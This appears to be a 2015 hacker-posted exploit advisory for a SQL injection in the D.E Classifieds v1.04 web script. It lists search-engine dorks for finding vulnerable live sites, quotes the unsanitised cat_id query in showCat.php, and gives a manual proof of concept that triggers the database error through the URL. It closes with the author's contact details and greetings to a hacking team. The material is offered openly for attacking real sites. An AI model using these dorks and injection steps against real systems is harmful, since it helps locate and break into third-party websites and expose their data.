facebook facebook twitter rss

D.E Classifieds v1.04 (Sql Injection)

Author: Sniper Pex , Published: 31-03-2015
######################################
- Exploit Title: D.E Classifieds v1.04 (Sql Injection)
- Found By: Sniper Pex
- From: Team Wolf Morrocan
- City: Marrakech , Morocco
- Tested On: Winxp SP3
######################################

.::Infos To Find Vulnerable Sites::.
##########################################
-Dorks:
1: intitle:"D.E. Classifieds" & inurl:"/index.php"
2: intitle:"D.E. Classifieds" & intext:"Welcome to the home page"
3: USE Your Mind
##############################################

.::Exploit File Error {showCat.php}::.
################################################
$result = mysql_query($query, $myDB);
$query = 'SELECT cat_id,parent_id,cat_name FROM std_categories WHERE cat_id=' . $cat_id;
$cat_id = $HTTP_GET_VARS['cat_id'];
global $HTTP_GET_VARS;
#####################################################

.::Exploit / P0c::.
#####################################################
- You Can inject The Site Manualy
Just Go To Site And Click In A Category & You Can See The Url (http://xxxx/path/showCat.php?cat_id=integer)
And Put ' In Url And You Can See The Sqli Error (Warning: mysql_num_rows(): supplied argument is not .....)
########################################################

.::Contact Me::.
#######################################
Email: Wassline@gmail.com
Facebook: http://fb.com/nassime.asrir
#########################################

.::Greetz To::.
#################################################################
Allah & All Arabian Muslims Hacker & My Friend Moroccan Red Light
Wgaaaaaaaaaaaaa3 Wlad Lmaghrib Wlad Marrakech L3zzz
#################################################################

Like us on Facebook :